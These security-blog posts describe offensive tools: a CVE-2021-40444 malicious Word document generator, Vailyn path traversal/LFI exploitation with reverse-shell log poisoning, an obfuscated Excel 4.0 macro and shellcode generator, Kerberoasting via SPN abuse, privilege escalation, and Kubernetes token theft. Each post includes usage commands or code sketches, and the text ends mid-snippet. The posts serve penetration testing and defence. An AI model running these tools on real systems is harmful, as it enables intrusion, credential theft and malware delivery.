RSS Security


DNSTake - A Fast Tool To Check Missing Hosted DNS Zones That Can Lead To Subdomain Takeover

16 September 2021 at 20:30
By: Zion3R


A fast tool to check missing hosted DNS zones that can lead to subdomain takeover.


What is a DNS takeover?

DNS takeover vulnerabilities occur when a subdomain (subdomain.example.com) or domain has its authoritative nameserver set to a provider (e.g. AWS Route 53, Akamai, Microsoft Azure, etc.) but the hosted zone has been removed or deleted. Consequently, when making a request for DNS records the server responds with a SERVFAIL error. This allows an attacker to create the missing hosted zone on the service that was being used and thus control all DNS records for that (sub)domain.ΒΉ


Installation

from Binary

The ez way! You can download a pre-built binary from the releases page, just unpack and run!


from Source
NOTE: Go 1.16+ compiler should be installed & configured!

Very quick & clean!

β–Ά go install github.com/pwnesia/dnstake/cmd/dnstake@latest

β€” or

Manually build the executable from source code:

β–Ά git clone https://github.com/pwnesia/dnstake
β–Ά cd dnstake/cmd/dnstake
β–Ά go build .
β–Ά (sudo) mv dnstake /usr/local/bin

Usage
$ dnstake -h

Β·β–„β–„β–„β–„ ▐ β–„ .β–„β–„ Β·β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„ β€’β–„ β–„β–„β–„ .
β–ˆβ–ˆβ–ͺ β–ˆβ–ˆ β€’β–ˆβ–Œβ–β–ˆβ–β–ˆ β–€.β€’β–ˆβ–ˆ β–β–ˆ β–€β–ˆ β–ˆβ–Œβ–„β–Œβ–ͺβ–€β–„.β–€Β·
β–β–ˆΒ· β–β–ˆβ–Œβ–β–ˆβ–β–β–Œβ–„β–€β–€β–€β–ˆβ–„β–β–ˆ.β–ͺβ–„β–ˆβ–€β–€β–ˆ ▐▀▀▄·▐▀▀β–ͺβ–„
β–ˆβ–ˆ. β–ˆβ–ˆ β–ˆβ–ˆβ–β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–ŒΒ·β–β–ˆ β–ͺβ–β–Œβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–„β–„β–Œ
β–€β–€β–€β–€β–€β€’ β–€β–€ β–ˆβ–ͺ β–€β–€β–€β–€ β–€β–€β–€ β–€ β–€ Β·β–€ β–€ β–€β–€β–€

(c) pwnesia.org β€” v0.0.1

Usage:
[stdin] | dnstake [options]
dnstake -t HOSTNAME [options]

Options:
-t, --target <HOST/FILE> Define single target host/list to check
-c, --concurrent <i> Set the concurrency level (default: 25)
-s, --silent Suppress errors and/or clean output
-h, --help Display its help

Examples:
dnstake -t (sub.)domain.tld
dnstake -t hosts.txt
cat hosts.txt | dnstake
subfinder -silent -d domain.tld | dnstake

Workflow

DNSTake uses the RetryableDNS client library to send DNS queries. It first queries the target using Google & Cloudflare DNS as resolvers, then checks & fingerprints the target host's nameservers. If any are found, it resolves the target host again using those nameserver IPs as resolvers; if it gets an unexpected DNS status response (anything other than NOERROR/NXDOMAIN), the host is vulnerable to takeover. The project's diagram shows this flow more or less.
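
For illustration, here is a minimal sketch of that check in Python with the dnspython library (pip install dnspython); this is not DNSTake's own code (DNSTake is written in Go), and the target name is a placeholder:

import dns.message
import dns.query
import dns.rcode
import dns.resolver

target = "sub.example.com"  # placeholder target

# Find the nameservers the target is delegated to.
for ns in dns.resolver.resolve(target, "NS"):
    ns_host = str(ns.target).rstrip(".")
    ns_ip = str(dns.resolver.resolve(ns_host, "A")[0])

    # Ask that nameserver directly about the target.
    response = dns.query.udp(dns.message.make_query(target, "A"), ns_ip, timeout=5)

    # Anything besides NOERROR/NXDOMAIN (e.g. SERVFAIL, REFUSED) suggests
    # the hosted zone is gone and may be claimable on the provider.
    if response.rcode() not in (dns.rcode.NOERROR, dns.rcode.NXDOMAIN):
        print(f"{target} @ {ns_host}: {dns.rcode.to_text(response.rcode())}")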

Currently supported DNS providers, see here.


References

License

DNSTake is distributed under MIT. See LICENSE.



CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

16 September 2021 at 13:13
By: Zion3R


Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing the URL in exploit.html at calc.cab


Using

First, generate a malicious docx document from a DLL. You can use the one at test/calc.dll, which just pops calc.exe from a call to system():

python3 exploit.py generate test/calc.dll http://<SRV IP>



Once you generate the malicious docx (it will be at out/) you can set up the server:

sudo python3 exploit.py host 80



Finally try the docx in a Windows Virtual Machine:



Plution - Prototype Pollution Scanner Using Headless Chrome

16 September 2021 at 11:30
By: Zion3R


Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp


What this is not

This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.


How it works

Plution appends a payload to supplied URLs, navigates to each URL with headless Chrome, and runs JavaScript on the page to verify whether a prototype was successfully polluted.
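
Plution itself is written in Go; as a rough sketch of the same check in Python with Playwright (pip install playwright, then playwright install chromium; the URL is a placeholder):

from playwright.sync_api import sync_playwright

url = "https://target.example/page"  # placeholder target page

with sync_playwright() as p:
    browser = p.chromium.launch()
    page = browser.new_page()
    # Append a pollution payload to the URL, as Plution does.
    page.goto(url + "?__proto__[zzzc]=polluted")
    # Run JS on the page to see whether Object.prototype was polluted.
    if page.evaluate("window.zzzc") == "polluted":
        print(f"[VULNERABLE] {url}")
    browser.close()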


How it is used
  • Basic scan, output only to screen:
    cat URLs.txt | plution

  • Scan with a supplied payload rather than hardcoded one:
    cat URLs.txt|plution -p '__proto__.zzzc=example'
    Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

  • Output:
    Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

  • Concurrency:

  • Pass the '-c' option to specify how many concurrent jobs are run (default is 5)


Questions and answers
  • How do I install it?
    go get -u github.com/raverrr/plution

  • Why specifically limit it to checking if window.zzzc is defined?
    zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead

  • Got a more specific question?
    Ask me on twitter @divadbate.



Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution

16 September 2021 at 03:00
By: Zion3R


Time for another Kali Linux release! – Kali Linux 2021.3. This release has various impressive updates.

A summary of the changes since the 2021.2 release from June:

  • OpenSSL - Wide compatibility by default - Keep reading for what that means
  • New Kali-Tools site - Following the footsteps of Kali-Docs, Kali-Tools has had a complete refresh
  • Better VM support in the Live image session - Copy & paste and drag & drop from your machine into a Kali VM by default
  • New tools - From adversary emulation, to subdomain takeover to Wi-Fi attacks
  • Kali NetHunter smartwatch - first of its kind, for TicHunter Pro
  • KDE 5.21 - Plasma desktop received a version bump

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

15 September 2021 at 20:30
By: Zion3R


Vailyn


Phased Path Traversal & LFI Attacks

Vailyn 3.0

Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use --lfi to include them in the scan.


About

Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to be as performant as possible and to offer a wide arsenal of filter evasion techniques.


How does it work?

Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file) with all of its evasive payloads, then analysing the responses to separate the payloads that worked from the others.

Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase.

The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.

Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.


Why the phase separation?

The separation into several phases hugely improves the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This caused a huge overhead, because payloads were used again and again even when they did not work for the current page.


Installation

Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform

$ git clone https://github.com/VainlyStrain/Vailyn

Once on your system, you'll need to install the Python dependencies.


Unix Systems

On Unix systems, it is sufficient to run

$ pip install -r requirements.txt   # --user

Windows

Some libraries Vailyn uses do not work well with Windows, or will fail to install.

If you use Windows, use pip to install the requirements listed in Vailyn\requirements-windows.txt.

If twisted fails to install, there is an unofficial version available here, which should build under Windows. Just bear in mind that this is a 3rd party download, and the integrity isn't necessarily guaranteed. Once it installs successfully, running pip again on requirements-windows.txt should work.


Final Steps

If you want to fully use the reverse shell module, you'll need to have sshpass, ncat and konsole installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like konsole, you can specify a different terminal emulator in core/config.py.

That's it! Fire Vailyn up by moving to its installation directory and performing

$ python Vailyn -h

Usage

Vailyn has 3 mandatory arguments: -v VIC, -a INT and -p2 TP P1 P2. However, depending on -a, more arguments may be required.

          [ Vailyn ASCII-art banner ]
| Vailyn |
[ VainlyStrain ]

Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2
[-p PAM] [-i F] [-Pi VIC2]
[-c C] [-n] [-d I J K]
[-s T] [-t] [-L]
[-l] [-P] [-A]

mandatory:
-v VIC, --victim VIC Target to attack, part 1 [pre-payload]
-a INT, --attack INT Attack type (int, 1-5, or A)
A| Spider (all) 2| Path 5| POST Data, json
P| Spider (partial) 3| Cookie
1| Query Parameter 4| POST Data, plain

-p2 TP P1 P2, --phase2 TP P1 P2
Attack in Phase 2, and needed parameters

β”Œ[ Values ]──────────────┬────────────────────┐
β”‚ TP      β”‚ P1           β”‚ P2                 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€€
β”‚ leak    β”‚ File Dict    β”‚ Directory Dict     β”‚
β”‚ inject  β”‚ IP Addr      β”‚ Listening Port     β”‚
β”‚ implant β”‚ Source File  β”‚ Server Destination β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

additional:
-p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5
-i F, --check F File to check for in Phase 1 (df: etc/passwd)
-Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
-c C, --cookie C Cookie to append (in header format)
-l, --loot Download found files into the loot folder
-d I J K, --depths I J K
depths (I: phase 1, J: phase 2, K: permutation level)
-h, --help show this help menu and exit
-s T, --timeout T Request Timeout; stable switch for Arjun
-t, --tor Pipe attacks through the Tor anonymity network
-L, --lfi Additionally use PHP wrappers to leak files
-n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)
-P, --precise Use exact depth in Phase 1 (not a range)
-A, --app Start Vailyn's Qt5 interface

develop:
--debug Display every path tried, even 404s.
--version Print program version and exit.
--notmain Avoid notify2 crash in subprocess call.

Info:
to leak files using absolute paths: -d 0 0 0
to get a shell using absolute paths: -d 0 X 0

Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the -a INT argument.

INT        attack
---- -------
1 query-based attack (https://site.com?file=../../../)
2 path-based attack (https://site.com/../../../)
3 cookie-based attack (will grab the cookies for you)
4 plain post data (ELEM1=VAL1&ELEM2=../../../)
5 json post data ({"file": "../../../"})
A spider fetch + analyze all URLs from site using all vectors
P partial spider fetch + analyze all URLs from site using only selected vectors

You also must specify a target to attack. This is done via -v VIC and -Pi VIC2, where -v is the part before the injection point, and -Pi the rest.

Example: if the final URL should look like: https://site.com/download.php?file=<ATTACK>&param2=necessaryvalue, you can specify -v https://site.com/download.php and -Pi &param2=necessaryvalue (and -p file, since this is a query attack).

If you want to include PHP wrappers in the scan (like php://filter), use the --lfi argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked (if any).

If the attacked site is behind a login page, you can supply an authentication cookie via -c COOKIE. If you want to attack over Tor, use --tor.


Phase 1

This is the analysis phase, where working payloads are separated from the others.

By default, /etc/passwd is looked up. If the server is not running Linux, you can specify a custom file by -i FILENAME. Note that you must include subdirectories in FILENAME. You can modify the lookup depth with the first value of -d (default=8). If you want to use absolute paths, set the first depth to 0.


Phase 2

This is the exploitation phase, where Vailyn will try to leak as many files as possible, or gain a reverse shell using various techniques.

The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the -d argument. The level of subdirectory permutation is set by the third value of -d.

If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.

By specifying -l, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.

If you want verbose output (display every response, not only found files), you can use --debug. Note that the output gets really messy; this is basically just a debugging aid.

To perform the bruteforce attack, you need to specify -p2 leak FIL PATH, where

  • FIL is a dictionary file containing filenames only (e.g. index.php)
  • PATH, is a dictionary file containing directory names only. Vailyn will handle directory permutation for you, so you'll need only one directory per line.

To gain a reverse shell by code injection, you can use -p2 inject IP PORT, where

  • IP is your listening IP
  • PORT is the port you want to listen on.

WARNING

Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.

The techniques (only work for LFI inclusions):

  • /proc/self/environ inclusion only works on outdated servers
  • Apache + Nginx Log Poisoning & inclusion
  • SSH Log Poisoning
  • poisoned mail inclusion
  • wrappers
    • expect://
    • data:// (plain & b64)
    • php://input

False Positive prevention

To distinguish real results from false positives, Vailyn does the following checks (a minimal sketch follows the list):

  • check the status code of the response
  • check if the response is identical to one taken before attack start: this is useful, e.g., when the server returns 200 but ignores the payload input, or returns a default page if the file is not found.
  • similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing)
  • check for empty responses
  • check if common error signatures are in the response content
  • check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like ../../secret not found)
  • check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404
  • for -a 2, perform an additional check if the response content matches the content from the server root URL
  • REGEX check for /etc/passwd if using that as lookup file
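
Here is a minimal Python sketch of a few of these checks; the helper and names (looks_real, baseline_body) are illustrative assumptions, not Vailyn's actual internals:

import re

PASSWD_RE = re.compile(r"^[^:\n]+:[^:\n]*:\d+:\d+:", re.MULTILINE)
ERROR_SIGNATURES = ("failed to open stream", "No such file or directory")

def looks_real(body, status, payload, baseline_body):
    if status != 200 or not body.strip():
        return False                      # status code / empty-response checks
    if body == baseline_body:
        return False                      # identical to the pre-attack response
    if payload in body:
        return False                      # payload reflected in an error message
    if any(sig in body for sig in ERROR_SIGNATURES):
        return False                      # common error signatures
    return bool(PASSWD_RE.search(body))   # /etc/passwd shape for the default lookup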

Examples
  • Simple Query attack, leaking files in Phase 2: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT

  • Query attack, but I know a file file.php exists exactly 2 levels above the inclusion point: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P This will greatly shorten Phase 1, since it's a targeted attack.

  • Simple Path attack: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT

  • Path attack, but I need query parameters and tag: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title

  • Simple Cookie attack: $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs Will fetch cookies and let you select the cookie you want to poison

  • POST Plain Attack: $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" will infect DATA2 with the payload

  • POST JSON Attack: $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'

  • Attack, but target is behind login screen: $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"

  • Attack, but I want a reverse shell on port 1337: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection (will start a ncat listener for you if on Unix)

  • Full automation in crawler mode: $ Vailyn -v "http://root-url.site" -a A you can also specify other args, like cookie, depths, lfi & lookup file here

  • Full automation, but Arjun needs --stable: $ Vailyn -v "http://root-url.site" -a A -s ANY


Demo

Vailyn's Crawler analyzing a damn vulnerable web application (LFI wrappers not enabled).

GUI Demonstration (v2.2.1-5)


Possible Issues

Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!


Code of Conduct

Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities in web applications, which could be exploited maliciously.

THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.

By using this software, the user agrees to follow their local laws, and not to attack someone else's system without explicit permission from the owner, or with malicious intent.

In case of an infringement, only the end user who committed it is accountable for their actions.


Credits & Copyright

Vailyn: Copyright Β© VainlyStrain

Arjun: Copyright Β© s0md3v

Arjun is no longer distributed with Vailyn. Install its latest version via pip.



Rootend - A *Nix Enumerator And Auto Privilege Escalation Tool

15 September 2021 at 11:30
By: Zion3R


rootend is a Python *nix enumerator & auto privilege escalation tool.

For a full list of our tools, please visit our website https://www.twelvesec.com/

Written by @nickvourd of @twelvesec (special thanks to @maldevel & servo).


Usage
Enumeration & Automation Privilege Escalation tool. rootend is an open source tool licensed under GPLv3. Affected systems: *nix. Written by: @nickvourd of @twelvesec. Special thanks to @maldevel & servo. https://www.twelvesec.com/ Please visit https://github.com/twelvesec/rootend for more.. optional arguments: -h, --help show this help message and exit -v, --version show version and exit -a, --auto automated privilege escalation process -m, --manual system enumeration -n, --nocolor disable color -b, --banner show banner and exit -s, --suid suid binary enumeration -w, --weak weak permissions of files enumeration -p, --php PHP configuration files enumeration -c, --capabilities capabilities enumeration -f, --full-writables world writable files enumeration usage examples: ./rootend.py -a ./rootend.py -m ./rootend.py -v ./rootend.py -b Specific categories usage examples: ./rootend.py -a -s ./rootend.py -m -w ./rootend.py -a -s -p ./rootend.py -m -w -c -p ./rootend.py -a -s -c -p -f *Use the above arguments with -n to disable color. ">
[ TwelveSec ASCII-art banner ]
rootend v.2.0.2 - Enumeration & Automation Privilege Escalation tool.
rootend is an open source tool licensed under GPLv3.
Affected systems: *nix.
Written by: @nickvourd of @twelvesec.
Special thanks to @maldevel & servo.
https://www.twelvesec.com/
Please visit https://github.com/twelvesec/rootend for more..

optional arguments:
-h, --help show this help message and exit
-v, --version show version and exit
-a, --auto automated privilege escalation process
-m, --manual system enumeration
-n, --nocolor disable color
-b, --banner show banner and exit
-s, --suid suid binary enumeration
-w, --weak weak permissions of files enumeration
-p, --php PHP configuration files enumeration
-c, --capabilities capabilities enumeration
-f, --full-writables world writable files enumeration

usage examples:
./rootend.py -a
./rootend.py -m
./rootend.py -v
./rootend.py -b

Specific categories usage examples:
./rootend.py -a -s
./rootend.py -m -w
./rootend.py -a -s -p
./rootend.py -m -w -c -p
./rootend.py -a -s -c -p -f

*Use the above arguments with -n to disable color.


Version

2.0.2

Supports
  • Python 2.x
  • Python 3.x

Tested on
  • Python 2.7.18rc1
  • Python 3.8.2

Modes
  • Manual
  • Auto

Exploitation Categories

Suid Binaries:
  • General Suids
  • Suids for reading files
  • Suids for creating file as root
  • Limited Suids
  • Custom Suids

Weak Permissions:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Weak Ownership:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Capabilities:
  • General Capabilities
  • Custom Capabilities
  • With CAP_SETUID

Interesting Files:
  • PHP Configuration Files
  • World Writable Files


BoobSnail - Allows Generating Excel 4.0 XLM Macro

14 September 2021 at 20:30
By: Zion3R


BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
[ BoobSnail ASCII-art banner ]
Author: @_mzer0 @stm_cyber
(...)

Generators usage
python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel
  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library, which allows you to create your own Excel4 macro generator. excel4lib contains a few classes that can be used when writing a generator:

  • excel4lib.macro.Excel4Macro - allows defining Excel4 formulas, values and variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - allows obfuscating the instructions created in Excel4Macro;
  • excel4lib.lang.Excel4Translator - allows translating formulas into another language.

The main idea of this library is to represent Excel4 formulas, variables, formula arguments, and values as Python objects. Thanks to that, you can easily change instruction attributes such as formula or variable names, values, addresses, etc. For example, let's create a simple macro that runs calc.exe:

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this, you just need to import the obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc. to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfuscate formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro into another language, for example your native language (in my case it's Polish). With excel4lib it's pretty easy: just import the Excel4Translator class and call set_language:

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now, only English and Polish are supported. If you want to use another language, you need to add translations in the excel4lib/lang/langs directory.

At some point you will need to create a formula that takes another formula as an argument. You can do this by using the Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Author

mzer0 from the stm_cyber team!


Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator



targetedKerberoast - Kerberoast With ACL Abuse Capabilities

14 September 2021 at 11:30
By: Zion3R


targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have an SPN set. This tool brings the following additional feature: for each user without an SPN, it tries to set one (abusing write permission on the servicePrincipalName attribute), prints the "kerberoast" hash, and deletes the temporary SPN it set for that operation. This is called targeted Kerberoasting. The tool can be run against all users of a domain, against users supplied in a list, or against a single user supplied on the CLI.
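
A minimal Python sketch of the temporary-SPN trick using ldap3 (pip install ldap3); the server, credentials and DN are placeholders, and the actual TGS request (e.g. via Impacket) is left out:

from ldap3 import Server, Connection, NTLM, MODIFY_ADD, MODIFY_DELETE

server = Server("dc01.domain.local")  # placeholder DC
conn = Connection(server, user="DOMAIN\\auditor", password="...",
                  authentication=NTLM, auto_bind=True)

target_dn = "CN=victim,CN=Users,DC=domain,DC=local"  # placeholder DN
temp_spn = "host/victim-takeover"

# 1. Abuse write access to set a temporary SPN on the target account.
conn.modify(target_dn, {"servicePrincipalName": [(MODIFY_ADD, [temp_spn])]})
# 2. ...request a TGS for temp_spn here and save the roastable hash...
# 3. Clean up: remove the temporary SPN again.
conn.modify(target_dn, {"servicePrincipalName": [(MODIFY_DELETE, [temp_spn])]})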

More information about this attack


Usage

This tool supports the following authentication methods (see the help below).

Among other things, targetedKerberoast supports multi-level verbosity: just append -v, -vv, ... to the command :)

usage: targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER]
[-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]

Queries target domain for SPNs that are running under a user account and operate targeted Kerberoasting

optional arguments:
-h, --help show this help message and exit
-v, --verbose verbosity level (-v for verbose, -vv for debug)
-q, --quiet show no information at all
-D TARGET_DOMAIN, --target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-U USERS_FILE, --users-file USERS_FILE
File with user per line to test
--request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-o OUTPUT_FILE, --output-file OUTPUT_FILE
Output filename to write ciphers in JtR/hashcat format
--use-ldaps Use LDAPS instead of LDAP
--only-abuse Ignore accounts that already have an SPN and focus on targeted Kerberoasting
--no-abuse Don't attempt targeted Kerberoasting

authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

secrets:
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--no-pass don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)

Below is an example of what the tool can do.


Credits and references

Credits to the whole team behind Impacket and its contributors.



Peirates - Kubernetes Penetration Testing Tool

13 September 2021 at 20:30
By: Zion3R


What is Peirates?

Peirates, a Kubernetes penetration tool, enables an attacker to escalate privilege and pivot through a Kubernetes cluster. It automates known techniques to steal and collect service accounts, obtain further code execution, and gain control of the cluster.
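
For context, the service-account theft it automates boils down to reading the token Kubernetes mounts into every pod and replaying it against the API server. A minimal Python sketch of that idea (standard mount paths, placeholder namespace; Peirates itself is written in Go):

import requests

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"  # standard mount path
token = open(f"{SA_DIR}/token").read()

# Replay the stolen token against the in-cluster API server.
resp = requests.get(
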